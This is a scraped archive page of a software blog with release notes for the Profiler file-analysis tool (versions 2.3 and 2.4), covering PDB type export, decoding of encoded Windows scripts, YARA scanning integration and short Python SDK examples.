src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/scan-providers/" rel="bookmark"><time class="entry-date published" datetime="2015-09-21T22:13:50+00:00">September 21, 2015</time><time class="updated" datetime="2021-04-01T16:32:53+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="comments-link"><a href="https://blog.cerbero.io/scan-providers/#respond">Leave a comment<span class="screen-reader-text"> on Scan Providers</span></a></span> </footer> <article id="post-1539" class="post-1539 post type-post status-publish format-standard hentry category-suite-standard tag-command-line tag-news"> <header class="entry-header"> <h2 class="entry-title"><a href="https://blog.cerbero.io/profiler-2-4/" rel="bookmark">Profiler 2.4</a></h2> </header> <div class="entry-content"> <p>Profiler 2.4 is out with the following news:</p> <p>– <a href="/?p=1530">added initial support for PDB files (including export of types)</a><br> – <a href="#wscript">added support for Windows Encoded Scripts (VBE, JSE)</a><br> – introduced fixed xml structures<br> – <a href="#sdec">added automatic string decoding in struct tables</a><br> – <a href="#pyline">added Python string command line execution</a><br> – remember the last selected logic group<br> – fixed missing support for wchar_t in C types<br> – updated Qt to 5.4.1<br> – various bug fixes</p> <p>While the most important newly introduced feature is the support for PDB files, here are some interesting new features:</p> <p><a name="wscript"></a></p> <h2>Support for Windows Encoded Scripts (VBE, JSE)</h2> <p>Windows encoded scripts like VBE and JSE files (the encoded variants of VBS and JS script files) are now supported and automatically decoded.</p> <p><a href="/wp-content/uploads/2015/06/24/wscript.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/24/wscript.png"></a></p> <p>In the screen-shot you can see the decoded output of an encoded file (showed at the bottom).</p> <p><a name="sdec"></a></p> <h2>Automatic string decoding in struct tables</h2> <p>A very basic feature: byte-arrays in structures are automatically checked for strings and in case decoded.</p> <p><a href="/wp-content/uploads/2015/06/24/sdec.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/24/sdec.png"></a></p> <p>(notice the section name automatically displayed as ascii string)</p> <p><a name="pyline"></a></p> <h2>Python string command line execution</h2> <p>Apart from <a href="/?p=1464">executing script files passed as command line arguments</a>, now it is also possible to execute Python statements directly passed as argument. </p> <p>For instance:</p> <pre lang="text">cerpro -c -e "from Pro.Core import *;proCoreContext().msgBox(0, \"Hello world!\")"</pre> <p>The optional argument ‘-c’ specifies to not display the UI.</p> <p>Enjoy!</p></div><footer class="entry-footer"> <span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/profiler-2-4/" rel="bookmark"><time class="entry-date published" datetime="2015-06-06T16:43:45+00:00">June 6, 2015</time><time class="updated" datetime="2021-04-01T16:33:35+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/command-line/" rel="tag">Command-line</a>, <a href="https://blog.cerbero.io/tag/news/" rel="tag">News</a></span><span class="comments-link"><a href="https://blog.cerbero.io/profiler-2-4/#respond">Leave a comment<span class="screen-reader-text"> on Profiler 2.4</span></a></span> </footer> </article> <article id="post-1530" class="post-1530 post type-post status-publish format-standard hentry category-suite-standard tag-headers tag-pdb tag-python tag-sdk"> <header class="entry-header"> <h2 class="entry-title"><a href="https://blog.cerbero.io/pdb-support-including-export-of-types/" rel="bookmark">PDB support (including export of types)</a></h2> </header> <div class="entry-content"> <p>The main feature of the upcoming 2.4 version of Profiler is the initial support for the PDB format. Our code doesn’t rely on the Microsoft DIA SDK and thus works also on OS X and Linux.</p> <p>Since the PDB format is undocumented, this task would’ve been extremely difficult without the <a href="http://undocumented.rawol.com/">fantastic work on PDBs</a> of the never too much revered Sven B. Schreiber.</p> <p>Let’s open a PDB file.</p> <p><a href="/wp-content/uploads/2015/06/pdb/streams.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/streams.png"></a></p> <p>As you can see the streams in the PDB can be explored. The TPI stream (the one describing types) offers further inspection.</p> <p><a href="/wp-content/uploads/2015/06/pdb/tpi.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/tpi.png"></a></p> <p>All the types contained in the PDB can be exported to a Profiler header by pressing Ctrl+R and executing the ‘Dump types to header’ action.</p> <p><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/action.png"></p> <p>Now the types can be used from both the hex editor and the Python SDK. </p> <p><a href="/wp-content/uploads/2015/06/pdb/hexed.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/hexed.png"></a></p> <p>We can explore the dumped header by using, as usual, the Header Manager tool.</p> <p><a href="/wp-content/uploads/2015/06/pdb/hdrmgr.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/hdrmgr.png"></a></p> <p>The type showed above in the hex editor is simple. So let’s look what a more complex PDB type may look like.</p> <pre lang="xml"><r id="CWnd" type="class" size="84"> <b> <b type="CCmdTarget" offset="0" access="public"> </b> <m id="_GetBaseClass" type="CRuntimeClass * ()"> <s id="classCWnd" type="CRuntimeClass const"> <m id="GetThisClass" type="CRuntimeClass * ()"> <m id="GetRuntimeClass" type="CRuntimeClass * ()"> <m id="CreateObject" type="CObject * ()"> <m id="GetCurrentMessage" type="tagMSG const * ()"> <f id="m_hWnd" type="HWND__ *" offset="32"> <m id="operator struct HWND__ *" type="HWND__ * ()"> <m id="operator==" type="int32 (CWnd const *)"> <m id="operator!=" type="int32 (CWnd const *)"> <m id="GetSafeHwnd" type="HWND__ * ()"> <m id="GetStyle" type="unsigned int ()"> <m id="GetExStyle" type="unsigned int ()"> <m id="ModifyStyle" type="int32 (HWND__ *, unsigned int, unsigned int, uint32)"> <m id="ModifyStyle" type="int32 (unsigned int, unsigned int, uint32)"> <m id="ModifyStyleEx" type="int32 (HWND__ *, unsigned int, unsigned int, uint32)"> <m id="ModifyStyleEx" type="int32 (unsigned int, unsigned int, uint32)"> <m id="GetOwner" type="CWnd * ()"> <m id="SetOwner" type="void (CWnd *)"> <m id="GetWindowInfo" type="int32 (tagWINDOWINFO *)"> <m id="GetTitleBarInfo" type="int32 (tagTITLEBARINFO *)"> <m id="CWnd" type="void (CWnd const *)"> <m id="CWnd" type="void (HWND__ *)"> <m id="CWnd" type="void ()"> <m id="FromHandle" type="CWnd * (HWND__ *)"> <m id="FromHandlePermanent" type="CWnd * (HWND__ *)"> <m id="DeleteTempMap" type="void ()"> <!-- etc. --> </m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></m></f></m></m></m></m></s></m></b></r></pre><b><s id="classCWnd" type="CRuntimeClass const"> <p>The PDB code is also exposed to the SDK. This is a small snippet of code, which dumps all the types to a text buffer and then displays them in a text view.</p> <pre lang="python">from Pro.Core import * from Pro.UI import * from Pro.PDB import * def showPDBTypes(): ctx = proContext() out = proTextStream() out.setIndentSize(4) obj = ctx.currentScanProvider().getObject() tpi = obj.GetStreamObject(PDB_STREAM_ID_TPI) tpihdr = obj.TPIHeader(tpi) tiMin = tpihdr.Num("tiMin") tiMax = tpihdr.Num("tiMax") tctx = obj.CreateTypeContext(tpi) for ti in range(tiMin, tiMax): tctx.DumpType(out, ti) view = ctx.createView(ProView.Type_Text, "PDB Test") view.setLanguage("XML") view.setText(out.buffer) ctx.addView(view) showPDBTypes()</pre> <p><a href="/wp-content/uploads/2015/06/pdb/pyresult.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/pyresult.png"></a></p> <p>In order to dump all types to a single header, you can use the <strong>DumpAllToHeader</strong> method.</p></s></b></div><footer class="entry-footer"><b><s id="classCWnd" type="CRuntimeClass const"> <span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/pdb-support-including-export-of-types/" rel="bookmark"><time class="entry-date published" datetime="2015-06-01T08:09:04+00:00">June 1, 2015</time><time class="updated" datetime="2021-04-01T16:34:10+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/headers/" rel="tag">Headers</a>, <a href="https://blog.cerbero.io/tag/pdb/" rel="tag">PDB</a>, <a href="https://blog.cerbero.io/tag/python/" rel="tag">Python</a>, <a href="https://blog.cerbero.io/tag/sdk/" rel="tag">SDK</a></span><span class="comments-link"><a href="https://blog.cerbero.io/pdb-support-including-export-of-types/#respond">Leave a comment<span class="screen-reader-text"> on PDB support (including export of types)</span></a></span> </s></b></footer><b><s id="classCWnd" type="CRuntimeClass const"> </s></b></article><b><s id="classCWnd" type="CRuntimeClass const"> <article id="post-1519" class="post-1519 post type-post status-publish format-standard hentry category-suite-standard tag-news"> <header class="entry-header"> <h2 class="entry-title"><a href="https://blog.cerbero.io/profiler-2-3/" rel="bookmark">Profiler 2.3</a></h2> </header> <div class="entry-content"> <p>Profiler 2.3 is out with the following news:</p> <p>– <a href="/?p=1506">introduced YARA 3.2 support</a><br> – <a href="#lgroups">added groups for logic providers</a><br> – <a href="#enctxt">added Python action to encode/decode text</a><br> – <a href="#x2t">added Python action to strip XML down to text</a><br> – <a href="#fixfont">added the possibility to choose the fixed font</a><br> – <a href="#colrand">added color randomization for structs and intervals</a><br> – <a href="#repapis">added close report and quit APIs</a><br> – <a href="#repapis">exposed more methods of the Report class (including save)</a><br> – improved indentation handling in the script editor<br> – <a href="#outsync">synchronized main and workspace output views</a><br> – improved output view<br> – updated libmagic to 5.21<br> – updated Capstone to 3.0<br> – many small improvements<br> – fixed libmagic on Linux<br> – removed the tray icon<br> – minor bug fixes</p> <p><a name="lgroups"></a></p> <h2>Logic provider groups</h2> <p>Logic providers can now be grouped in order to avoid clutter in the main window. Adding the following line to an existing logic provider will result in a new group being created:</p> <pre lang="python">group = Extra</pre> <p><a href="/wp-content/uploads/2014/12/23/lgroups.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/lgroups.png"></a></p> <p><a name="enctxt"></a></p> <h2>Encode/decode text action</h2> <p>A handy Python action to convert from hex to text and vice-versa using all of Python’s supported encodings. Place yourself in a hex or text view and run the encoding/decoding action ‘Bytes to text’ or ‘Text to bytes’.</p> <p><a href="/wp-content/uploads/2014/12/23/enctext.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/enctext.png"></a></p> <p>The operation will open a new text or hex view depending if it was an encoding or a decoding. </p> <p><a name="x2t"></a></p> <h2>XML to text action</h2> <p>Strips tags from an XML and displays only the text. The action can be performed both on a hex and text view. </p> <p><a href="/wp-content/uploads/2014/12/23/x2t.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/x2t.png"></a></p> <p>And it will open a new text view. This is useful to view the text of a DOCX or ODT document. In the future the preview for these documents will be made available automatically, but in the meantime this action is helpful.</p> <p><a href="/wp-content/uploads/2014/12/23/docxprev.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/docxprev.png"></a></p> <p><a name="fixfont"></a></p> <h2>Fixed font preferences</h2> <p>The fixed font used in most views can now be chosen from the ‘General’ settings.</p> <p><a name="colrand"></a></p> <h2>Struct/intervals color randomization</h2> <p>When adding a structure or interval to the hex view the chosen color is now being randomized every time the dialog shows up. This behaviour can be disabled from the dialog itself and it’s also possible to randomize again the color by clicking on the specific refresh button.</p> <p><a href="/wp-content/uploads/2014/12/23/colrand.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/colrand.png"></a></p> <p>Manually picking a different color for every interval is time consuming and so this feature should speed up raw data analysis.</p> <p><a name="repapis"></a></p> <h2>Report APIs</h2> <p>Most of the report APIs have been exposed (check out the SDK documentation). This combined with the newly introduced ‘quit’ SDK method can be used to perform custom scans programmatically and save the resulting report.</p> <p>Here’s a small example which can be launched from the command line:</p> <pre lang="python">from Pro.Core import * import sys ctx = proCoreContext() def init(): ctx.getSystem().addFile(sys.argv[1]) return True def rload(): ctx.unregisterLogicProvider("test_logic") ctx.getReport().saveAs("auto.cpro") ctx.quit() ctx.registerLogicProvider("test_logic", init, None, None, None, rload) ctx.startScan("test_logic")</pre> <p>The command line syntax to run this script would be:</p> <pre lang="text">cerpro -r scan.py [file to scan]</pre> <p>The UI will show up and close automatically once the ‘quit’ method is called. Running this script in console mode using the ‘-c’ parameter is not yet possible, because of the differences in message handling on different platforms, but it will be in the future.</p> <p><a name="outsync"></a></p> <h2>Synchronized output views</h2> <p>The output view of the main window and of the workspace are now synchronized, thus avoiding missing important log messages being printed in one or the other context.</p> <p>Enjoy!</p></div><footer class="entry-footer"> <span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/profiler-2-3/" rel="bookmark"><time class="entry-date published" datetime="2014-12-27T02:16:53+00:00">December 27, 2014</time><time class="updated" datetime="2021-04-01T16:34:49+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/news/" rel="tag">News</a></span><span class="comments-link"><a href="https://blog.cerbero.io/profiler-2-3/#respond">Leave a comment<span class="screen-reader-text"> on Profiler 2.3</span></a></span> </footer> </article> <article id="post-1506" class="post-1506 post type-post status-publish format-standard hentry category-action category-suite-standard tag-signatures tag-yara"> <header class="entry-header"> <h2 class="entry-title"><a href="https://blog.cerbero.io/yara-3-2-0-support/" rel="bookmark">YARA 3.2.0 support</a></h2> </header> <div class="entry-content"> <p>The upcoming 2.3 version of Profiler includes support for the latest YARA engine. This new release is scheduled for the first week of January and it will include YARA on all supported platforms.</p> <p>One inherent technical advantage of having YARA support in Profiler is that it will be possible to scan for YARA rules inside embedded files/objects, like files in a Zip archive, in a CHM file, in an OLEStream, streams in a PDF, etc.</p> <p>The YARA engine itself has been compiled with all standard modules (except for cuckoo). Even the <strong>magic</strong> module is available, since libmagic is also supported by Profiler.</p> <p>The initial YARA integration comes as a hook extension, an action and Python SDK support. The YARA Python support is the official one and differs from it only in the import statement. You can run existing YARA Python code without modification by using the following import syntax:</p> <pre lang="python">import Pro.yara as yara</pre> <p>So let’s start a YARA scan. To do that, we need to enable the YARA hook extension. On Windows remember to configure Python in case you haven’t yet, since all extensions have been written in it.</p> <p><a href="/wp-content/uploads/2014/12/yara/1.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/1.png"></a></p> <p>When a scan is started, a YARA settings dialog will show up. </p> <p><a href="/wp-content/uploads/2014/12/yara/2.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/2.png"></a></p> <p>This dialog lets us choose various settings including the type of rules to load.</p> <p><a href="/wp-content/uploads/2014/12/yara/3.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/3.png"></a></p> <p>There are four possibilities. A simple text field containing YARA rules, a plain text rules file, a compiled rules file or a custom expression which must <strong>eval</strong> to a valid <strong>Rules</strong> object.</p> <p>The report settings specify how we will be alerted of matches. The ‘only matches’ option makes sure that only files (or their sub-files) with a match will be included in the final report. The ‘add to meta-data” option causes the matches to be visible as meta-data strings of a file. The ‘as threats’ option reports every match as a 100% risk threat. The ‘print to output’ option prints the matches to the output view.</p> <p>Since we had the ‘only matches’ option enabled, we will find only matching files in our final report.</p> <p><a href="/wp-content/uploads/2014/12/yara/4.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/4.png"></a></p> <p>And since we had also the ‘to meta-data’ option enabled, we will see the matches when opening a file in the workspace.</p> <p><a href="/wp-content/uploads/2014/12/yara/5.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/5.png"></a></p> <p>The YARA scan functionality comes also as an action when we find ourselves in a hex view. You can either scan the whole hex data or select a range. Then press Ctrl+R to run an action and select ‘YARA scan’.</p> <p><a href="/wp-content/uploads/2014/12/yara/6.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/6.png"></a></p> <p>In this case we won’t be given report options, since the only thing which can be performed is to print out matches in the output view.</p> <p><a href="/wp-content/uploads/2014/12/yara/7.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/7.png"></a></p> <p>Like this:</p> <p><a href="/wp-content/uploads/2014/12/yara/8.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/8.png"></a></p> <p>Of course, all supported platforms come also with the official YARA command line utility.</p> <p><a href="/wp-content/uploads/2014/12/yara/9.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/9.png"></a></p> <p>Since this has been a customer request for quite some time, I think it will be appreciated by some of our users.</p></div><footer class="entry-footer"> <span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/yara-3-2-0-support/" rel="bookmark"><time class="entry-date published" datetime="2014-12-26T02:19:13+00:00">December 26, 2014</time><time class="updated" datetime="2021-04-01T16:35:26+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/action/" rel="category tag">Action</a>, <a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/signatures/" rel="tag">signatures</a>, <a href="https://blog.cerbero.io/tag/yara/" rel="tag">YARA</a></span><span class="comments-link"><a href="https://blog.cerbero.io/yara-3-2-0-support/#respond">Leave a comment<span class="screen-reader-text"> on YARA 3.2.0 support</span></a></span> </footer> </article> <nav class="navigation pagination" aria-label="Posts pagination"> <h2 class="screen-reader-text">Posts pagination</h2> <div class="nav-links"><a class="prev page-numbers" href="https://blog.cerbero.io/page/16/">Previous page</a> <a class="page-numbers" href="https://blog.cerbero.io/"><span class="meta-nav screen-reader-text">Page </span>1</a> <span class="page-numbers dots">…</span> <a class="page-numbers" href="https://blog.cerbero.io/page/16/"><span class="meta-nav screen-reader-text">Page </span>16</a> <span aria-current="page" class="page-numbers current"><span class="meta-nav screen-reader-text">Page </span>17</span> <a class="page-numbers" href="https://blog.cerbero.io/page/18/"><span class="meta-nav screen-reader-text">Page </span>18</a> <span class="page-numbers dots">…</span> <a class="page-numbers" href="https://blog.cerbero.io/page/27/"><span class="meta-nav screen-reader-text">Page </span>27</a> <a class="next page-numbers" href="https://blog.cerbero.io/page/18/">Next page</a></div></nav> <aside id="secondary" class="sidebar widget-area"> <section id="search-2" class="widget widget_search"> <form role="search" method="get" class="search-form" action="https://blog.cerbero.io/"></form> <label> <span class="screen-reader-text"> Search for: </span> <input type="search" class="search-field" placeholder="Search …" value="" name="s"> </label> <button type="submit" class="search-submit"><span class="screen-reader-text"> Search </span></button> </section> <section id="recent-posts-2" class="widget widget_recent_entries"> <h2 class="widget-title">Recent Posts</h2><nav aria-label="Recent Posts"> <ul> <li> <a href="https://blog.cerbero.io/wim-format-package/" aria-current="page">WIM Format Package</a> </li> <li> <a href="https://blog.cerbero.io/hfs-file-system/">HFS+ File System</a> </li> <li> <a href="https://blog.cerbero.io/ext-file-systems/">EXT File Systems</a> </li> <li> <a href="https://blog.cerbero.io/ntfs-file-system/">NTFS File System</a> </li> <li> <a href="https://blog.cerbero.io/exfat-file-system/">ExFAT File System</a> </li> <li> <a href="https://blog.cerbero.io/disk-format-package/">Disk Format Package</a> </li> <li> <a href="https://blog.cerbero.io/fat-file-system/">FAT File System</a> </li> <li> <a href="https://blog.cerbero.io/prototype-memory-services/">Prototype Memory & Services</a> </li> <li> <a href="https://blog.cerbero.io/iso-format-2-0-package/">ISO Format 2.0 Package</a> </li> <li> <a href="https://blog.cerbero.io/memory-decompression-pagefiles/">Memory Decompression & Pagefiles</a> </li> </ul> </nav></section><section id="archives-4" class="widget widget_archive"><h2 class="widget-title">Archives</h2> <label class="screen-reader-text" for="archives-dropdown-4">Archives</label> <select id="archives-dropdown-4" name="archive-dropdown"> <option value="">Select Month</option> <option value="https://blog.cerbero.io/2025/06/"> June 2025 (1)</option> <option value="https://blog.cerbero.io/2025/05/"> May 2025 (7)</option> <option value="https://blog.cerbero.io/2025/04/"> April 2025 (4)</option> <option value="https://blog.cerbero.io/2025/03/"> March 2025 (2)</option> <option value="https://blog.cerbero.io/2024/10/"> October 2024 (3)</option> <option value="https://blog.cerbero.io/2024/09/"> September 2024 (1)</option> <option value="https://blog.cerbero.io/2024/08/"> August 2024 (3)</option> <option value="https://blog.cerbero.io/2024/07/"> July 2024 (5)</option> <option value="https://blog.cerbero.io/2024/06/"> June 2024 (2)</option> <option value="https://blog.cerbero.io/2024/04/"> April 2024 (4)</option> <option value="https://blog.cerbero.io/2024/03/"> March 2024 (1)</option> <option value="https://blog.cerbero.io/2024/02/"> February 2024 (1)</option> <option value="https://blog.cerbero.io/2024/01/"> January 2024 (4)</option> <option value="https://blog.cerbero.io/2023/12/"> December 2023 (3)</option> <option value="https://blog.cerbero.io/2023/11/"> November 2023 (7)</option> <option value="https://blog.cerbero.io/2023/10/"> October 2023 (3)</option> <option value="https://blog.cerbero.io/2023/09/"> September 2023 (1)</option> <option value="https://blog.cerbero.io/2023/07/"> July 2023 (1)</option> <option value="https://blog.cerbero.io/2023/05/"> May 2023 (11)</option> <option value="https://blog.cerbero.io/2023/03/"> March 2023 (9)</option> <option value="https://blog.cerbero.io/2023/02/"> February 2023 (3)</option> <option value="https://blog.cerbero.io/2023/01/"> January 2023 (1)</option> <option value="https://blog.cerbero.io/2022/11/"> November 2022 (1)</option> <option value="https://blog.cerbero.io/2022/09/"> September 2022 (2)</option> <option value="https://blog.cerbero.io/2022/08/"> August 2022 (2)</option> <option value="https://blog.cerbero.io/2022/07/"> July 2022 (3)</option> <option value="https://blog.cerbero.io/2022/06/"> June 2022 (2)</option> <option value="https://blog.cerbero.io/2022/05/"> May 2022 (5)</option> <option value="https://blog.cerbero.io/2022/04/"> April 2022 (3)</option> <option value="https://blog.cerbero.io/2022/03/"> March 2022 (4)</option> <option value="https://blog.cerbero.io/2022/02/"> February 2022 (6)</option> <option value="https://blog.cerbero.io/2022/01/"> January 2022 (1)</option> <option value="https://blog.cerbero.io/2021/11/"> November 2021 (4)</option> <option value="https://blog.cerbero.io/2021/10/"> October 2021 (5)</option> <option value="https://blog.cerbero.io/2021/09/"> September 2021 (7)</option> <option value="https://blog.cerbero.io/2021/06/"> June 2021 (1)</option> <option value="https://blog.cerbero.io/2021/04/"> April 2021 (1)</option> <option value="https://blog.cerbero.io/2021/03/"> March 2021 (4)</option> <option value="https://blog.cerbero.io/2021/02/"> February 2021 (1)</option> <option value="https://blog.cerbero.io/2020/12/"> December 2020 (1)</option> <option value="https://blog.cerbero.io/2020/11/"> November 2020 (1)</option> <option value="https://blog.cerbero.io/2020/10/"> October 2020 (1)</option> <option value="https://blog.cerbero.io/2020/09/"> September 2020 (2)</option> <option value="https://blog.cerbero.io/2020/07/"> July 2020 (2)</option> <option value="https://blog.cerbero.io/2020/01/"> January 2020 (1)</option> <option value="https://blog.cerbero.io/2019/09/"> September 2019 (1)</option> <option value="https://blog.cerbero.io/2019/08/"> August 2019 (2)</option> <option value="https://blog.cerbero.io/2019/07/"> July 2019 (1)</option> <option value="https://blog.cerbero.io/2019/06/"> June 2019 (1)</option> <option value="https://blog.cerbero.io/2019/05/"> May 2019 (3)</option> <option value="https://blog.cerbero.io/2019/04/"> April 2019 (2)</option> <option value="https://blog.cerbero.io/2018/06/"> June 2018 (1)</option> <option value="https://blog.cerbero.io/2018/04/"> April 2018 (1)</option> <option value="https://blog.cerbero.io/2018/03/"> March 2018 (1)</option> <option value="https://blog.cerbero.io/2018/01/"> January 2018 (1)</option> <option value="https://blog.cerbero.io/2017/11/"> November 2017 (2)</option> <option value="https://blog.cerbero.io/2017/03/"> March 2017 (5)</option> <option value="https://blog.cerbero.io/2016/07/"> July 2016 (2)</option> <option value="https://blog.cerbero.io/2016/05/"> May 2016 (2)</option> <option value="https://blog.cerbero.io/2016/04/"> April 2016 (1)</option> <option value="https://blog.cerbero.io/2015/10/"> October 2015 (2)</option> <option value="https://blog.cerbero.io/2015/09/"> September 2015 (2)</option> <option value="https://blog.cerbero.io/2015/06/"> June 2015 (2)</option> <option value="https://blog.cerbero.io/2014/12/"> December 2014 (2)</option> <option value="https://blog.cerbero.io/2014/10/"> October 2014 (1)</option> <option value="https://blog.cerbero.io/2014/09/"> September 2014 (3)</option> <option value="https://blog.cerbero.io/2014/08/"> August 2014 (1)</option> <option value="https://blog.cerbero.io/2014/07/"> July 2014 (1)</option> <option value="https://blog.cerbero.io/2013/12/"> December 2013 (2)</option> <option value="https://blog.cerbero.io/2013/11/"> November 2013 (5)</option> <option value="https://blog.cerbero.io/2013/10/"> October 2013 (5)</option> <option value="https://blog.cerbero.io/2013/09/"> September 2013 (6)</option> <option value="https://blog.cerbero.io/2013/08/"> August 2013 (6)</option> <option value="https://blog.cerbero.io/2013/07/"> July 2013 (1)</option> <option value="https://blog.cerbero.io/2013/06/"> June 2013 (4)</option> <option value="https://blog.cerbero.io/2013/05/"> May 2013 (7)</option> <option value="https://blog.cerbero.io/2013/04/"> April 2013 (5)</option> <option value="https://blog.cerbero.io/2013/03/"> March 2013 (3)</option> <option value="https://blog.cerbero.io/2013/02/"> February 2013 (4)</option> <option value="https://blog.cerbero.io/2013/01/"> January 2013 (3)</option> <option value="https://blog.cerbero.io/2012/12/"> December 2012 (3)</option> <option value="https://blog.cerbero.io/2012/11/"> November 2012 (5)</option> <option value="https://blog.cerbero.io/2012/10/"> October 2012 (3)</option> <option value="https://blog.cerbero.io/2012/09/"> September 2012 (1)</option> <option value="https://blog.cerbero.io/2012/08/"> August 2012 (2)</option> <option value="https://blog.cerbero.io/2012/07/"> July 2012 (2)</option> <option value="https://blog.cerbero.io/2012/06/"> June 2012 (2)</option> <option value="https://blog.cerbero.io/2012/05/"> May 2012 (2)</option> <option value="https://blog.cerbero.io/2012/04/"> April 2012 (1)</option> <option value="https://blog.cerbero.io/2012/03/"> March 2012 (6)</option> <option value="https://blog.cerbero.io/2012/02/"> February 2012 (5)</option> <option value="https://blog.cerbero.io/2012/01/"> January 2012 (8)</option> <option value="https://blog.cerbero.io/2011/11/"> November 2011 (1)</option> <option value="https://blog.cerbero.io/2011/08/"> August 2011 (1)</option> </select> <script>(function(){ var dropdown=document.getElementById("archives-dropdown-4"); function onSelectChange(){ if(dropdown.options[ dropdown.selectedIndex ].value!==''){ document.location.href=this.options[ this.selectedIndex ].value; }} dropdown.onchange=onSelectChange; })();</script> </section> </aside><footer id="colophon" class="site-footer"> <nav class="main-navigation" aria-label="Footer Primary Menu"> <div class="menu-main-container"><ul id="menu-main-1" class="primary-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1923"><a href="https://cerbero.io">Home</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-2790"><a href="#">Products</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom 